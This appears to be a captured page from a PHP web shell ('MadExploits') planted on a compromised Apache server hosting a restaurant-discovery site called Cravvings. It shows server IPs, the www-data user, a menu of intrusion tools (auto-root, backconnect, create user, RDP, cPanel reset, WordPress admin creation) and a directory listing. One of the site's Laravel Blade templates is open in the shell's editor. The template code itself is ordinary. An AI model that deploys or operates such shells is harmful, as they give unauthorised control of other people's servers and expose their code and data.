Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.220.97.0
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cravings /
resources /
views /
places /
[ HOME SHELL ]
Name
Size
Permission
Action
all.blade.php
85
B
-rw-rw-r--
api.nearby.save2.php
20.84
KB
-rw-rw-r--
api.view.save.php
5.63
KB
-rw-rw-r--
apinearby.blade.php
16.34
KB
-rw-rw-r--
apiview.blade.php
6.83
KB
-rw-rw-r--
apiviewnew.blade.php
22.63
KB
-rw-rw-r--
dropdown_menu.blade.php
719
B
-rw-rw-r--
explore.blade.php
15.42
KB
-rw-rw-r--
index.blade.php
9.18
KB
-rw-rw-r--
list.blade.php
1.07
KB
-rw-rw-r--
myplaces.blade.php
6.65
KB
-rw-rw-r--
namesearch.blade.php
821
B
-rw-rw-r--
new.blade.php
8.1
KB
-rw-rw-r--
newplace.blade.php
24.27
KB
-rw-rw-r--
np.blade.php
24.54
KB
-rw-rw-r--
place_reviews.blade.php
2.73
KB
-rw-rw-r--
place_search_input.blade.php
1.93
KB
-rw-rw-r--
placesearch.blade.php
10.82
KB
-rw-rw-r--
populate.blade.php
11.95
KB
-rw-rw-r--
prereview.blade.php
12.92
KB
-rw-rw-r--
rate.blade.php
5.12
KB
-rw-rw-r--
review-old.blade.php
12.22
KB
-rw-rw-r--
review.blade.php
13.51
KB
-rw-rw-r--
reviewss.blade.php
11.41
KB
-rw-rw-r--
shownew.blade.php
13.5
KB
-rw-rw-r--
suggest.blade.php
25.13
KB
-rw-rw-r--
view.blade.php
7.78
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : apiview.blade.php
@extends('layouts.topnav') @section('keywords') <meta name="keywords" content="{{ $placename }}, menu, reviews, lagos, {{ $tags }}, {{ $categories }}, explore, restaurants, phone number, location, address, opening times, pictures"> <meta name="description" content="{{ $placename }}, {{ $address }}, {{ $type }}"> @endsection @section('title') <meta content="Cravvings - {{ $placename }}" property="og:title"> <meta content="{{ route('places.show', ['place' => $slug]) }}" property="og:url"> <meta content="Discover restaurants and food vendors serving the food you want close to you." property="og:description"> @isset ($image[0]) <meta name="twitter:title" content="Cravvings - {{ $placename }}"> <meta name="twitter:description" content="Discover restaurants and other food vendors serving the food you want close to you."> <meta name="twitter:image:width" content="500"> <meta name="twitter:image:height" content="300"> <meta name="twitter:image" content="{{ $image[0] }}"> <meta content="{{ $image[0] }}" property="og:image"> @else <meta name="twitter:title" content="Cravvings - {{ $placename }}"> <meta name="twitter:description" content="Discover restaurants and other food vendors serving the food you want close to you."> <meta name="twitter:image" content="https://www.cravvings.com/images/brand/card_1.jpg"> <meta name="twitter:image:width" content="1250"> <meta name="twitter:image:height" content="750"> <meta content="https://www.cravvings.com/images/brand/card_1.jpg" property="og:image"> <meta content="1200" property="og:image:width"> <meta content="630" property="og:image:height"> @endisset <meta name="search_token" value="{{ $token ?? '' }}"> <meta name="twitter:image:alt" content="An image of the Cravvings logo - spelt out as cravvings with the v's overlapping and a spoon shaped curve c"> <title>Cravvings - {{ $placename }}</title> @endsection @section('extracss') @parent <link rel="stylesheet" href="/css2/vex.min.css"> <link rel="stylesheet" href="/css2/vex-theme-plain.css"> <link rel="stylesheet" href="/css/place.css"> <link rel="stylesheet" href="/css/header.css"> <style> .footers { justify-content: center; padding: 10px; background-color: #fff; border-top: 1px solid #ccc; } @media (max-width: 767px) { .footers { bottom: 48.8px !important; } } </style> @endsection @section('searchbar') @include('places.place_search_input') @endsection @section('content') <div class="row" id="loading" style="display: none; position: fixed;"> <div class="col-sm-12 mx-auto" style="display: flex;"> <div class="loader"></div> </div> </div> <nav class="navbar navbar-light bg-light"> <a class="navbar-brand go-back" href="#"><i class="fa fa-arrow-left"></i> Back</a> </nav> <div class="place-wrapper"> <header class="place-header" id="place-details"> <div class="container"> <div class="row"> <div class="col-md-6"> <div class="skeleton-background"></div> <div class="skeleton-background"></div> </div> <div class="col-md-6 review-wrapper"> <div class="reserve-seat-block"> <div class="review-btn"> <div class="skeleton-background"></div> <div class="skeleton-background"></div> </div> </div> </div> </div> </div> </header> <div class="search-food-menu" id="menu"> <input type="text" class="form-control filter-food" placeholder="Search food"> <span class="clear-text"><i class="fa fa-times"></i></span> </div> <section class="place-menu"> {{-- <div class="place-menu-categories"> --}} {{-- <nav class="nav-wrapper"> <ul class="categoty-list"> <li>Beverages</li> <li>Beverages</li> <li>Beverages</li> <li>Beverages</li> <li>Beverages</li> <li>Beverages</li> <li class="bev">Bevys</li> <li>Beverages</li> <li>Beverages</li> </ul> </nav> --}} {{-- </div> --}} <div class="place-menu-items" id="food-container"> @for ($i=0; $i<15; $i++) <div class="food-item review-wrapper"> <span class="title"> <span class="food-name-rating"> <span class="food-name"><div class="skeleton-background"></div></span> </span> <span class="price"> <div class="skeleton-background"></div> </span> </span> <span class="tags"> <div class="comments"> <span class="food-description"> <div class="skeleton-background"></div> </span> </div> </span> </div> @endfor </div> </section> </div> @if (Auth::user() && Auth::user()->role === 'admin') <div class="footers" style="position: fixed; bottom: 50; right: 0; left: 0;display: flex;"> <div class="footers-link"><a style="width: 100%; height: 100%;" href="{{ route('admin_edit_place', ['slug' => $slug]) }}"><span class="plus">Edit Place</span></a></div> </div> @endif @endsection @section('footer') {{-- @parent --}} @endsection @section('javascript') {{-- <script src="/js/side.js"></script> --}} <script src="{{ asset('js/utility.js') }}"></script> <script src="{{ asset('js/vex.min.js')}}"></script> <script src="/js/place.js"></script> <script> const filterInput = document.querySelector('.filter-food') const clearFilterText = document.querySelector('.clear-text') filterInput.addEventListener('keyup', function(){ clearFilterText.style.display = (this.value.length > 1) ? 'block' : 'none'; }) clearFilterText.addEventListener('click', function(){ filterInput.value = ''; this.style.display = 'none'; filterInput.dispatchEvent(new Event('keyup')) }); </script> @endsection
Close